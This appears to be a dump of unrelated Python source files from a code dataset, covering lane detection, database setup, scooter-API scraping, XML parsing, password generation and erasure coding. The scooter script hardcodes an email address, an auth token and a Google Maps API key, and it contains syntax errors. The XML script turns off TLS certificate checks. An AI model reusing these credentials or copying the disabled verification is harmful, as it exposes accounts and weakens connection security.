left_fit.append((slope, intercept))
else:
right_fit.append((slope, intercept))
if left_fit:
left_fit_avg = np.average(left_fit, axis = 0)
left_line = get_cords(img, left_fit_avg)
else:
left_line = np.array([0,0,0,0])
if right_fit:
right_fit_avg = np.average(right_fit, axis = 0)
right_line = get_cords(img, right_fit_avg)
else:
right_line = np.array([0,0,0,0])
return np.array([left_line, right_line])
if __name__ == "__main__":
cap = cv2.VideoCapture("./../Downloads/detect_lanes_from.mp4")
lines = np.asarray((np.array([0,0,0,0]), np.array([0,0,0,0])))
estimate = lines
while (cap.isOpened()):
_, frame = cap.read()
canny_img = canny(frame)
masked_img = region_of_interest(canny_img)
estimate = lines
#print(len(estimate), len(lines))
# Finding straight lines and therefore the lane lines --> Hough transform
lines = cv2.HoughLinesP(masked_img, 1, (np.pi / 180), 100, np.array([]), minLineLength = 10, maxLineGap = 500)
#print(estimate.shape, lines.shape)
if lines is None:
lines = estimate
# https://www.youtube.com/watch?v=4zHbI-fFIlI watch at 1.5x lol
avg_lines = average_slope_intercept(frame, lines)
#print(avg_lines)
line_img = dispay_lines(frame, avg_lines)
img_frame = cv2.addWeighted(frame, 1, line_img, 0.8, 0)
cv2.imshow("colour_camera_frame", img_frame)
cv2.imshow("contoured", masked_img)
if cv2.waitKey(2) == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
9,511 | 677154aa99a5a4876532f3e1edfec45b1790384c | from flask_marshmallow import Marshmallow
from models import Uservet
ma = Marshmallow()
class UserVetSchema(ma.Schema):
class Meta:
model = Uservet
user_vet_1 = ['dni','email','nombre','apellidos','telefono','tipo_uservet']
|
9,512 | 9db2377f15aaf28373959dad88c6ec7b6dacffd2 | import sys
sys.stdin = open('retire.txt', 'r')
def counseling(pay, row):
global max_sum
if row == N - 1:
if arr[row][0] == 1:
pay += arr[row][1]
max_sum = max(pay, max_sum)
return
if row == N:
max_sum = max(pay, max_sum)
return
if row > N - 1:
return
counseling(pay + arr[row][1], row + arr[row][0])
counseling(pay, row + 1)
N = int(input())
arr = [list(map(int, input().split())) for _ in range(N)]
# visit = [0] * N
max_sum = 0
counseling(0, 0)
print(max_sum)
|
9,513 | 2417dd4f3787742832fec53fec4592165d0fccfc | from tensorflow import keras
class SkippableSeq(keras.utils.Sequence):
def __init__(self, seq):
super(SkippableSeq, self).__init__()
self.start = 0
self.seq = seq
def __iter__(self):
return self
def __next__(self):
res = self.seq[self.start]
self.start = (self.start + 1) % len(self)
return res
def __getitem__(self, i):
if isinstance(i, slice):
assert i.step == None == i.stop and self.start == 0, \
'only one suffix slicing allowed'
oth = copy.copy(self)
oth.start = i.start
return oth
else:
return self.seq[(self.start + i) % len(self)]
def __len__(self):
return len(self.seq)
class PostprocessSeq(SkippableSeq):
def __init__(self, postprocess, seq):
super(PostprocessSeq, self).__init__(seq)
self.postprocess = postprocess
def __next__(self):
return self.postprocess(super(PostprocessSeq, self).__next__())
def __getitem__(self, i):
return self.postprocess(super(PostprocessSeq, self).__getitem__(i))
def make_enqueuer_generator(sequence, workers):
data_enqueuer = keras.utils.OrderedEnqueuer(sequence)
data_enqueuer.start(workers=workers, max_queue_size=workers + 1)
return data_enqueuer.get()
|
9,514 | 09792da1c3cc38c7df7def2b487c2078de4e8912 | import config
import psycopg2
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT
def check_db_exists(opt):
try:
conn = psycopg2.connect(opt)
cur = conn.cursor()
cur.close()
print('Database exists.')
return True
except:
print("Database doesn't exist.")
return False
def create_db(opt):
if check_db_exists(opt):
pass
else:
print("Creating new database.")
conn = psycopg2.connect(opt)
conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
cur = conn.cursor()
cur.execute(f"CREATE DATABASE {config.db_name};")
cur.close()
def create_tables(opt):
if check_db_exists(opt):
commands = (""" CREATE TABLE IF NOT EXISTS stock (
id SERIAL PRIMARY KEY,
ticker VARCHAR NOT NULL,
name VARCHAR NOT NULL,
created_date TIMESTAMP NOT NULL,
last_updated_date TIMESTAMP NOT NULL
)
""",
""" CREATE TABLE IF NOT EXISTS price (
id SERIAL PRIMARY KEY,
stock_id INTEGER NOT NULL,
created_date TIMESTAMP NOT NULL,
last_updated_date TIMESTAMP NOT NULL,
date_price TIMESTAMP,
open_price NUMERIC,
high_price NUMERIC,
low_price NUMERIC,
close_price NUMERIC,
volume BIGINT,
FOREIGN KEY (stock_id) REFERENCES stock(id))
""",
""" CREATE TABLE IF NOT EXISTS fundamentals (
id SERIAL PRIMARY KEY,
stock_id INTEGER NOT NULL,
created_date TIMESTAMP NOT NULL,
last_updated_date TIMESTAMP NOT NULL,
longBusinessSummary TEXT,
sector VARCHAR,
sharesOutstanding BIGINT,
marketCap BIGINT,
forwardPE REAL,
dividendYield REAL,
beta REAL,
previousClose REAL,
averageVolume BIGINT,
FOREIGN KEY (stock_id) REFERENCES stock(id))
""",
""" CREATE TABLE IF NOT EXISTS news (
id SERIAL PRIMARY KEY,
stock_id INTEGER NOT NULL,
news_date TIMESTAMP NOT NULL,
headline VARCHAR NOT NULL,
url VARCHAR NOT NULL,
sentiment REAL,
FOREIGN KEY (stock_id) REFERENCES stock(id))
"""
)
try:
for command in commands:
print('Building database tables')
conn = psycopg2.connect(opt)
cur = conn.cursor()
cur.execute(command)
conn.commit()
cur.close()
except (Exception, psycopg2.DatabaseError) as e:
print(e)
cur.close()
else:
pass
def main():
opt = f"postgres://{config.username}:{config.password}@{config.host}:{config.port}/{config.cluster}.{config.db_name}?sslmode=verify-full&sslrootcert={config.cert_dir}/cc-ca.crt"
create_db(opt)
create_tables(opt)
if __name__ == "__main__":
main()
|
9,515 | 9e43eb3c3ab3be4e695dbc80aa005332b8d8a4ec | from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class StravaAuthConfig(AppConfig):
name = "strava.contrib.strava_django"
verbose_name = _("Strava Auth")
def ready(self):
pass
|
9,516 | 9c320db85ca1a9df6b91f6bb062e4d5c3d94ee91 | from test.framework import TestCase
from test.mock import Mock
from package.util.svnutil import ReleaseXmlParser, Release
import time
class SvnUtilTests(TestCase):
def setUp(self):
r1 = Release()
r1.name = 'BETA1.1.0'
r1.type = 'BETA'
r1.version = '1.1.0'
r1.date = time.strptime('2009-04-21 23:22:03', '%Y-%m-%d %H:%M:%S')
r2 = Release()
r2.name = 'STABLE0.4.9'
r2.type = 'STABLE'
r2.version = '0.4.9'
r2.date = time.strptime('2009-01-07 22:58:31', '%Y-%m-%d %H:%M:%S')
self.expected = [r1, r2]
def testXmlLoad(self):
""" XML from svn list should be parsed correctly into releases"""
loader = ReleaseXmlParser(text=xml)
releases = loader.get_releases()
self.assertTrue(releases, 'No release loaded')
self.assertEquals(self.expected, releases, "Releases not loaded correctly")
xml = """<?xml version="1.0"?>
<lists>
<list
path="svn://localhost/tools/packagehelper/tags">
<entry
kind="dir">
<name>1.0.1b</name>
<commit
revision="39">
<author>daniel</author>
<date>2009-04-07T05:59:19.743486Z</date>
</commit>
</entry>
<entry
kind="dir">
<name>BETA1.1.0</name>
<commit
revision="43">
<author>dsaran</author>
<date>2009-04-21T23:22:03.748373Z</date>
</commit>
</entry>
<entry
kind="dir">
<name>RELEASE_1_0_0b</name>
<commit
revision="37">
<author>daniel</author>
<date>2009-04-06T17:49:17.446056Z</date>
</commit>
</entry>
<entry
kind="dir">
<name>STABLE0.4.9</name>
<commit
revision="3">
<date>2009-01-07T22:58:31.000000Z</date>
</commit>
</entry>
</list>
</lists>"""
|
9,517 | c5f46be6d7214614892d227c76c75e77433a8fa9 | from CTO import CTO
#from UI import UIManager
from Cidades import Cidades
from Database import Database
from datetime import datetime
class Main:
def __init__(self, cidade_filename="", dados_filename=""):
#cidade_filename, dados_filename = UIManager().get_filenames()
print("cidade: " + cidade_filename)
self.cidades = Cidades(cidade_filename)
if dados_filename != "":
self.processaCSV(dados_filename)
self.recuperaDados()
self.insereDados()
def processaCSV(self, filename):
with open(filename, 'r', encoding='ISO-8859-1') as input_file:
self.concessao = {}
self.expansao = {}
for line in input_file.readlines():
attributes = line.split(';')
localidade = str(attributes[14])
estacao = str(attributes[15])
cto = str(attributes[1])
status = str(attributes[13])
if localidade in self.cidades.concessao:
if cto in self.concessao:
self.concessao[cto].addLeitura(status)
else:
self.concessao[cto] = CTO(localidade, estacao, cto)
self.concessao[cto].addLeitura(status)
elif localidade in self.cidades.expansao:
if cto in self.expansao:
self.expansao[cto].addLeitura(status)
else:
self.expansao[cto] = CTO(localidade, estacao, cto)
self.expansao[cto].addLeitura(status)
def insereDados(self):
hoje = datetime.utcnow()
#hoje = datetime(2019, 1, 25)
argsCn = []
for nome, cto in self.concessao.items():
nomeCto = cto.dict['CTO']
try:
antigoOcupado = self.antigoConcessao[nomeCto][8]
antigoData = self.antigoConcessao[nomeCto][1]
ocupadoAtual = int(cto.dict['OCUPADO'])
vagoAtual = int(cto.dict['VAGO'])
numDias = (hoje - self.antigoConcessao[nomeCto][1]).days
taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias
previsao = vagoAtual / taxa_crescimento
except Exception as e:
previsao = -1
argsCn.append(
(hoje,) + cto.as_a_tuple() + (previsao,)
)
argsEx = []
for nome, cto in self.expansao.items():
nomeCto = cto.dict['CTO']
try:
antigoOcupado = self.antigoExpansao[nomeCto][8]
antigoData = self.antigoExpansao[nomeCto][1]
ocupadoAtual = int(cto.dict['OCUPADO'])
vagoAtual = int(cto.dict['VAGO'])
numDias = (hoje - self.antigoExpansao[nomeCto][1]).days
taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias
previsao = vagoAtual / taxa_crescimento
except Exception as e:
previsao = -1
argsEx.append(
(hoje,) + cto.as_a_tuple() + (previsao,)
)
db = Database()
query = """INSERT INTO concessao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"""
db.executaQuery(query, argsCn)
query = """INSERT INTO expansao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"""
db.executaQuery(query, argsEx)
def recuperaDados(self):
db = Database()
self.antigoConcessao = {}
self.antigoExpansao = {}
for registro in db.executaQuery('SELECT * from concessao where dia = (select Max(dia) from concessao)'):
self.antigoConcessao[registro[4]] = registro
for registro in db.executaQuery('SELECT * from expansao where dia = (select Max(dia) from expansao)'):
self.antigoExpansao[registro[4]] = registro
if __name__ == '__main__':
Main()
|
9,518 | 2d192963bfe046bce1a0c82e0179380693f5c541 | from tkinter import *
root = Tk()
photo = PhotoImage(file = 'flag.png')
panel = Label(root, image=photo)
panel.pack()
root.mainloop()
|
9,519 | 020691fe2c7e7092d45415b72ce1804618421a2a | """
Question:
You are given a string s consisting only of digits 0-9, commas ,, and dots .
Your task is to complete the regex_pattern defined below, which will be used to
re.split() all of the , and . symbols in s.
It’s guaranteed that every comma and every dot in s is preceded and followed
by a digit.
Sample Input:
100,000,000.000
Sample Output:
100
000
000
000
"""
# Solution:
import re
regex_pattern = r"[,.]"
print("\n".join(re.split(regex_pattern, input())))
|
9,520 | 625a5d14aaf37493c3f75ec0cdce77d45ca08f78 | #Packages to be imported
import requests
import pandas as pd
from geopy.distance import distance
import json
from datetime import date
from datetime import datetime
import time
#POST request to get authentication token
URL = "https://api.birdapp.com/user/login"
email = {"email": "himanshu.agarwal20792@gmail.com"}
headers = {"User-Agent": "Bird/4.41.0 (co.bird.Ride; build:37; iOS 12.3.1) Alamofire/4.41.0",
"Device-Id": "54253685-49a0-48e0-a239-759e77639506",
"Platform": "ios",
"App-Version": "4.41.0",
"Content-Type": "application/json"}
r = requests.post(URL, json= email, headers = headers)
r.status_code
print(r.text)
#GET request to fetch the data
"""Washington D.C. - George Washington University"""
URL_get3 = "https://api.birdapp.com/bird/nearby?latitude=38.899600&longitude=-77.048820&radius=0.00001"
loc3 = {"latitude":38.899600,"longitude":-77.04882,"altitude":500,"accuracy":100,"speed":-1,"heading":-1}
headers_get3 = {
"Authorization": "Bird eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJBVVRIIiwidXNlcl9pZCI6IjVlYWQ2M2UyLWFiNGItNDZiYy1hNjZlLTI5N2NmNTJkM2VkMSIsImRldmljZV9pZCI6IjU0MjUzNjg1LTQ5YTAtNDhlMC1hMjM5LTc1OWU3NzYzOTUwNiIsImV4cCI6MTU5NzM2OTk2N30.hVSnrrx_adyrS2ecIyRba5E8Q-3RoylZ8WwBbqo15GY",
"Device-id": "54253685-49a0-48e0-a239-759e77639506",
"App-Version": "4.41.0",
"Location": '{"latitude":38.899600,"longitude":-77.048820,"altitude":500,"accuracy":100,"speed":-1,"heading":-1}'
}
rget3 = requests.get(URL_get3, headers = headers_get3, params = loc3)
rget3.status_code
rget3.text
json_data3 = rget3.json()
"""
To get configuration settings
URL_get4 = "https://api.birdapp.com/config/location?latitude=42.3140089&longitude=-71.2490943
loc3 = {"latitude":38.922368,"longitude":-77.019448,"altitude":500,"accuracy":100,"speed":-1,"heading":-1}
headers_get4 = {
"App-Version": "4.41.0"
}
rget4 = requests.get(URL_get4, headers = headers_get4)
rget4.status_code
rget4.text
json_data4 = rget4.json()
"""
"""Arlington"""
URL_get5 = "https://api.birdapp.com/bird/nearby?latitude=38.883694&longitude=-77.168652&radius=0.00001"
loc5 = {"latitude":38.883694,"longitude":-77.168652,"altitude":500,"accuracy":100,"speed":-1,"heading":-1}
headers_get5 = {
"Authorization": "Bird eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJBVVRIIiwidXNlcl9pZCI6IjVlYWQ2M2UyLWFiNGItNDZiYy1hNjZlLTI5N2NmNTJkM2VkMSIsImRldmljZV9pZCI6IjU0MjUzNjg1LTQ5YTAtNDhlMC1hMjM5LTc1OWU3NzYzOTUwNiIsImV4cCI6MTU5NzM2OTk2N30.hVSnrrx_adyrS2ecIyRba5E8Q-3RoylZ8WwBbqo15GY",
"Device-id": "54253685-49a0-48e0-a239-759e77639506",
"App-Version": "4.41.0",
"Location": '{"latitude":38.883694,"longitude":-77.168652,"altitude":500,"accuracy":100,"speed":-1,"heading":-1}'
}
rget5 = requests.get(URL_get5, headers = headers_get5, params = loc5)
rget5.status_code
rget5.text
json_data5 = rget5.json()
#Putting birds values as a dataframe
import pandas as pd
df5 = pd.DataFrame.from_dict(json_data5['birds'], orient = 'columns')
df5 = pd.concat([df5.drop(['location'],axis=1), df5['location'].apply(pd.Series)],axis=1)
"""Washington DC -2"""
URL_get6 = "https://api.birdapp.com/bird/nearby?latitude=38.910456&longitude=-76.987568&radius=0.00001"
loc6 = {"latitude":38.910456,"longitude":-76.987568,"altitude":500,"accuracy":100,"speed":-1,"heading":-1}
headers_get6 = {
"Authorization": "Bird eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJBVVRIIiwidXNlcl9pZCI6IjVlYWQ2M2UyLWFiNGItNDZiYy1hNjZlLTI5N2NmNTJkM2VkMSIsImRldmljZV9pZCI6IjU0MjUzNjg1LTQ5YTAtNDhlMC1hMjM5LTc1OWU3NzYzOTUwNiIsImV4cCI6MTU5NzM2OTk2N30.hVSnrrx_adyrS2ecIyRba5E8Q-3RoylZ8WwBbqo15GY",
"Device-id": "54253685-49a0-48e0-a239-759e77639506",
"App-Version": "4.41.0",
"Location": '{"latitude":38.910456,"longitude":-76.987568,"altitude":500,"accuracy":100,"speed":-1,"heading":-1}'
}
rget6 = requests.get(URL_get6, headers = headers_get6, params = loc6)
rget6.status_code
rget6.text
json_data6 = rget6.json()
#Finding distance of bikes from origin point and appending the values to the json data
""""George Washington Univ""""
x=0
radius = []
gwu = (38.899600,-77.04882)
for i in json_data3['birds']:
d = json_data3['birds'][x]['location']
b = tuple(d.values())
r = distance(gwu,b).mi
radius.append(r)
x = x+1
i.update({'Origin_Dist':r})
i.update({'Date':date.today().strftime('%Y-%m-%d')})
i.update({'Time':datetime.now().strftime('%H-%M-%S')})
i.update({'Origin_Loc':'DC-GWU'})
print(max(radius))
""""Washington-DC 2""""
x2=0
radius2 = []
dc2 = (38.910456,-76.987568)
for i in json_data6['birds']:
d2 = json_data6['birds'][x2]['location']
b2 = tuple(d2.values())
r = distance(dc2,b2).mi
radius2.append(r)
x2 = x2+1
i.update({'Origin_Dist':r})
i.update({'Date':date.today().strftime('%Y-%m-%d')})
i.update({'Time':datetime.now().strftime('%H-%M-%S')})
i.update({'Origin_Loc':'DC-2'})
print(max(radius2))
"""Arlington""""
x3=0
radius3 = []
dc3 = (38.910456,-76.987568)
for i in json_data5['birds']:
d3 = json_data5['birds'][x3]['location']
b3 = tuple(d3.values())
r = distance(dc3,b3).mi
radius3.append(r)
x3 = x3+1
i.update({'Origin_Dist':r})
i.update({'Date':date.today().strftime('%Y-%m-%d')})
i.update({'Time':datetime.now().strftime('%H-%M-%S')})
i.update({'Origin_Loc':'Arlington'})
print(max(radius3))
#Creating a dataframe for data received from each origin point
"""George Washington Univ"""
df3 = pd.DataFrame.from_dict(json_data3['birds'], orient = 'columns')
df3 = pd.concat([df3.drop(['location'],axis=1), df3['location'].apply(pd.Series)],axis=1)
"""Washington-DC 2"""
df6 = pd.DataFrame.from_dict(json_data6['birds'], orient = 'columns')
df6 = pd.concat([df6.drop(['location'],axis=1), df6['location'].apply(pd.Series)],axis=1)
"""Arlington"""
df5 = pd.DataFrame.from_dict(json_data5['birds'], orient = 'columns')
df5 = pd.concat([df5.drop(['location'],axis=1), df5['location'].apply(pd.Series)],axis=1)
#Combining dataframes from the three origin points
frames = [df3,df5,df6]
df_keys = pd.concat(frames, ignore_index = True)
df_keys['id'].nunique() #To find how many unique birds we retrieved.
#Creating a JSON File (If needed)
with open("sample_json.json","a+") as write_file: #This command is used to append new data to existing file
json.dump(json_data3, write_file, indent = 4)
with open("sample_json.json","w") as write_file: #This command just overwrites new data to existing file
json.dump(json_data3, write_file, indent = 4)
#Mapping of birds on Google Maps (Works in Jupyter Notebook)
import gmaps
gmaps.configure(api_key="AIzaSyDsWngN6Fn0rVOMClQqE21kkmhEG_z0vgM")
locations = df4[['latitude','longitude']]
fig = gmaps.figure()
washington_coordinates = (38.899600,-77.04882)
|
9,521 | f66306908f1fdd5c662804e73596b445c66dc176 | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
from sqlalchemy.orm.session import sessionmaker, query
from FoodPandaStore.FoodPandaStore.model import *
import datetime as dt
from datetime import datetime
class FoodpandastoreInfo2Pipeline:
def __init__(self):
engine = db_connect()
create_tables(engine)
self.session = sessionmaker(bind=engine)
def process_item(self, item, spider):
session = self.session()
new_store_info = FoodPandaStoreInfo2(
id=item['id'],
code=item['code'],
category=item['category'],
name=item['name'],
url=item['url'],
rating=item.get('rating', None),
address=item['address'],
latitude=item['latitude'],
longitude=item['longitude'],
is_pickup_available=item['is_pickup_available'],
is_delivery_available=item['is_delivery_available'],
is_active=item['is_active'],
date=dt.datetime.utcnow()
)
new_ts = TambonStore(
store_id=item['id'],
sub_district_id=item['sub_district_id'],
district_id=item['district_id'],
province_id=item['province_id'],
updated_datetime=datetime.utcnow())
existing_tambon = session.query(TambonGeo2).filter_by(sub_district_id = item['sub_district_id'],
district_id=item['district_id'],
province_id=item['province_id']).first()
if existing_tambon:
## Store
existing_store_info = session.query(FoodPandaStoreInfo2).filter_by(id=item['id']).first()
existing_tambon_store = session.query(TambonStore).filter_by(store_id=item['id'],
sub_district_id=item['sub_district_id'],
district_id=item['district_id'],
province_id=item['province_id']).first()
if existing_store_info:
session.merge(existing_store_info)
if existing_tambon_store:
session.merge(new_ts)
else:
session.add(new_ts)
else:
session.add(new_store_info)
session.add(new_ts)
menus = item.get('menus', [])
for menu in menus:
m = FoodPandaStoreMenu2(
id=menu['id'],
name=menu['name'],
type=menu['type'],
opening_time=menu['opening_time'],
closing_time=menu['closing_time']
)
new_store_info.menus.append(m)
else:
print('{}, {}, {} is not persisted in TambonGeo'.format(item['sub_district_id'],
item['district_id'],
item['province_id']))
session.commit()
session.close() |
9,522 | 02e40e051c19116c9cb3a903e738232dc8f5d026 |
from BeautifulSoup import BeautifulSoup, NavigableString
from urllib2 import urlopen
from time import ctime
import sys
import os
import re
restaurants = ["http://finweb.rit.edu/diningservices/brickcity",
"http://finweb.rit.edu/diningservices/commons",
"http://finweb.rit.edu/diningservices/crossroads",
"http://finweb.rit.edu/diningservices/gvcantinagrille",
"http://finweb.rit.edu/diningservices/gracies",
"http://finweb.rit.edu/diningservices/ritzsportszone"]
pretty_header = """
---------------------------------------------------
Parser Of On-campus Preferred Specials
a.k.a.
______ ______ ______ ______ _____
| _ | __ | __ | _ |/ ____|
| |_) | | | | | | | |_) | (___
| ___| | | | | | | ___|\___ \\
| | | |__| | |__| | | ____) |
| | | | | | | |
|__| |______|______|__| |_____/
It is currently {curtime}
---------------------------------------------------
[1] Brick City Cafe
[2] Commons
[3] Crossroads
[4] Global Village Cantina and Grille
[5] Gracies
[6] Ritz Sports Zone
[q] Quit
==================================================="""
def menu():
""" Do all the heavy lifting."""
while True:
# Loop till user quits.
sel = 0
while ( sel < 1 or sel > len(restaurants)):
# Input validation
print pretty_header.format(curtime=ctime())
sel = raw_input("Enter your menu choice [1-6 or q]: ")
if sel.lower() == "q":
sys.exit(0)
try:
sel = int(sel)
except:
sel = 0
os.system("clear")
# Load meals from desired restaurant.
html = urlopen(restaurants[sel-1])
soup = BeautifulSoup(html, convertEntities = BeautifulSoup.HTML_ENTITIES)
meals = soup.findAll(id=re.compile("meal_\d"))
tabs = soup.findAll(id=re.compile("tab_\d"))
# get the name of the restaurant, minus the "RIT Dining Services" bs.
print ("\nOn the menu at " + re.sub("^[\w\W]*\s?:\s?", "",
str(soup.title.string)) + " today is:")
meal_num = 0
for meal in meals:
if meal:
# print all meals served + meal name / subrestaurant name
print ("=====================")
print tabs[meal_num].contents[0].string
print ("=====================\n")
meal_num += 1
for item in meal.findAll("li"):
if item.string and str(item.string) != "":
print item.string
print ("\n")
raw_input("Press any key to continue...")
os.system("clear")
if sys.version[0] != "2":
print "This script uses BeautifulSoup for html parsing."
print "BeautifulSoup only supports Python 2.x"
menu()
|
9,523 | d3b0a1d8b9f800c5d34732f4701ea2183405e5b4 | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 3 18:27:30 2020
@author: PREET MODH
"""
for _ in range(int(input())):
n=int(input())
xco,yco=[],[]
flagx,flagy,xans,yans=1,1,0,0
for x in range(4*n-1):
x,y=input().split()
xco.append(int(x))
yco.append(int(y))
xco.sort(),yco.sort()
xco.append(xco[-1]+1),yco.append(yco[-1]+1)
countx,county,i=1,1,0
while(i<len(xco)-1):
if flagx==1:
if xco[i]==xco[i+1]:
countx+=1
else:
if countx%2!=0:
xans=xco[i]
flagx=0
countx=1
if flagy==1:
if yco[i]==yco[i+1]:
county+=1
else:
if county%2!=0:
yans=yco[i]
flagy=0
county=1
if flagx==0 and flagy==0:
break
i=i+1
print(xans,yans,end=' ')
|
9,524 | f327f408ae2759407ac9f01ad4feff5c6a0845f1 | #Function to remove spaces in a string
def remove(string_input):
return string_input.replace(" ", "")
|
9,525 | 3b8c4f19e28e54e651862ec9b88b091c9faff02b | import urllib.request, urllib.parse, urllib.error
from urllib.request import urlopen
import xml.etree.ElementTree as ET
import ssl
# # Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url = input('Enter a URL: ')
# if len(url) < 1 : url = 'http://py4e-data.dr-chuck.net/comments_42.xml'
if len(url) < 1 : url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'
# uh = urllib.request.urlopen(url)
# data = uh.read()
# print('Retrieved', len(data), 'characters')
# print(data.decode())
xml = urlopen(url, context=ctx).read()
print(len(xml))
stuff = ET.fromstring(xml)
lst = stuff.findall('comments/comment')
print('Comment count:', len(lst))
tot = 0
# counts = stuff.findall('.//count')
# print(counts)
for item in lst:
# print('Name', item.find('name').text)
# print('Count', item.find('count').text)
x = int(item.find('count').text)
tot = tot + x
print(tot)
|
9,526 | 0c283cd31203291da24226a0eae781bd397e84d4 | '''
Generate a ten-character alphanumeric password with at least one lowercase,
at least one uppercase character, and at least three digits
'''
import secrets
import string
alphabets = string.ascii_letters + string.digits
while True:
password = "".join(secrets.choice(alphabets) for i in range(10))
if(any(c.islower() for c in password) and
any(c.isupper() for c in password) and
sum(c.isdigit() for c in password) >= 3):
print(password)
break
|
9,527 | 0ebd19079a16a6e3da34da2ecfda0d159b8580b2 | #!/usr/bin/python
#
# @name = 'fmsrutil.py'
#
# @description = "F-MSR utilities module."
#
# @author = ['YU Chiu Man', 'HU Yuchong', 'TANG Yang']
#
import sys
import os
import random
from finitefield import GF256int
from coeffvector import CoeffVector
from coeffvector import CoeffMatrix
import common
#Check if C library of F-MSR is installed:
import codings.clibfmsr.clibfmsr
useClibfmsr = True
def getNativeBlockNum(n, k):
'''Get number of native blocks.'''
return k*(n-k)
def getParityBlockNum(n, k):
'''Get number of parity blocks.'''
return n*(n-k)
def getNodeIdList(n, k):
'''Find the node id for a segment of blocks.'''
'''Return a list of node id for the blocks.'''
nodeidList = []
segmentSize = n-k
blockNum = getParityBlockNum(n, k)
for i in range(int(blockNum/segmentSize)):
for j in range(segmentSize):
nodeidList.append(i)
return nodeidList
def getParityCoeff(n, k):
'''Get the parity coefficients of the blocks.'''
nativeBlockNum = getNativeBlockNum(n, k)
parityBlockNum = getParityBlockNum(n, k)
parityCoeff = []
for i in range(parityBlockNum):
for j in range(nativeBlockNum):
parityCoeff.append(GF256int(i+1)**j)
return parityCoeff
def encode(n, k, src, parityCoeff, setting, metadata):
'''Encode src file to parity chunks.'''
nativeBlockNum = getNativeBlockNum(n, k)
parityBlockNum = getParityBlockNum(n, k)
infile = open(src, 'rb')
indatalist = infile.read()
infile.close()
totalchunk = nativeBlockNum
filesize = len(indatalist)
#Generate info for big-chunk:
for i in range(metadata.totalnode):
fileNode = common.FileNodeMetadata(i)
fileNode.nodekey = setting.nodeInfo[i].nodekey
fileNode.nodetype = setting.nodeInfo[i].nodetype
fileNode.bucketname = setting.nodeInfo[i].bucketname
fileNode.bigchunksize = 0
fileNode.chunknum = 0
metadata.fileNodeInfo.append(fileNode)
#Encode indatalist to outdatalist
if filesize > 0:
chunksize = filesize/totalchunk + 1
indatalist += '\0'*(chunksize*totalchunk - filesize)
parityCoeff_temp = ''.join([chr(parity) for parity in parityCoeff])
outdatalist = codings.clibfmsr.clibfmsr.encodeComputation(indatalist, \
parityCoeff_temp, nativeBlockNum, parityBlockNum, chunksize)
else:
chunksize = 0
#Generate info for small chunks:
nodeIdList = getNodeIdList(n, k)
for i in range(parityBlockNum):
chunk = common.ChunkMetadata(i)
chunk.chunkname = metadata.filename + '.chunk' + str(i)
chunk.chunksize = chunksize
chunk.chunktype = 'parity'
chunk.chunkpath = setting.chunkdir + '/' + chunk.chunkname
nodeid = nodeIdList[i]
chunk.nodeid = nodeid
chunk.nodekey = setting.nodeInfo[nodeid].nodekey
chunk.nodetype = setting.nodeInfo[nodeid].nodetype
chunk.bucketname = setting.nodeInfo[nodeid].bucketname
chunk.action = 'upload'
#Add chunk position inside big-chunk:
chunk.position = metadata.fileNodeInfo[nodeid].chunknum
metadata.chunkInfo.append(chunk)
#Add support for big-chunk:
metadata.fileNodeInfo[nodeid].bigchunksize += chunk.chunksize
metadata.fileNodeInfo[nodeid].chunknum += 1
metadata.totalchunk = parityBlockNum
metadata.parityCoeff = parityCoeff[:]
#Generate big-chunks:
startchunk = 0
writelen = 1048576
for i in range(metadata.totalnode):
dest = setting.chunkdir + '/' + metadata.filename + '.node' + str(i)
if chunksize > 0:
f = open(dest, 'wb')
numchunks = nodeIdList.count(i)
writenext = startchunk*chunksize
for j in range(startchunk*chunksize, (startchunk+numchunks)*chunksize-writelen, writelen):
writenext = j+writelen
f.write(outdatalist[j:writenext])
f.write(outdatalist[writenext:(startchunk+numchunks)*chunksize])
f.close()
startchunk += numchunks
else:
open(dest, 'wb').close()
metadata.fileNodeInfo[i].bigchunkpath = dest
metadata.fileNodeInfo[i].bigchunkname = metadata.filename + '.node' + str(i)
metadata.fileNodeInfo[i].action = 'upload'
def reversematrix(n, k, gj_matrix):
'''Reverse matrix.'''
## The first elimination: decoding matrix -> lower unit triangular matrix
nativeBlockNum = getNativeBlockNum(n, k)
parityBlockNum = getParityBlockNum(n, k)
for rowNo in range(nativeBlockNum):
##1.find the rowNo row vector with 1st-coeff of valve non-zero
A = GF256int(0)
for i in range(rowNo,nativeBlockNum,1):
if gj_matrix[i][rowNo]!=0:
A = gj_matrix[i][rowNo]
break
##2. permutation between the rowNo row vector and the ith row vector
temp_vector = [GF256int(0)]*(nativeBlockNum*2)
if i!= rowNo:
for j in range(nativeBlockNum*2):
temp_vector[j] = gj_matrix[i][j]
gj_matrix[i][j] = gj_matrix[rowNo][j]
gj_matrix[rowNo][j] = temp_vector[j]
##3. in rowNo-th row vector, all the coeffs/1st coeff
for m in range(nativeBlockNum*2):
gj_matrix[rowNo][m] = gj_matrix[rowNo][m]/A
##4. The row vectors below rowNo-th row vector eliminate the rowNo-th coeff
for j in range(rowNo+1,nativeBlockNum,1):
B = gj_matrix[j][rowNo]
for m in range(rowNo,nativeBlockNum*2,1):
gj_matrix[j][m] = gj_matrix[j][m] - gj_matrix[rowNo][m]*B
# The second elimination: decoding matrix -> unit matrix
##5. The row vectors above rowNo-th row vector eliminate the rowNo-th coeff
for rowNo in range(nativeBlockNum-1,0,-1):
for j in range(0,rowNo,1):
C = gj_matrix[j][rowNo]
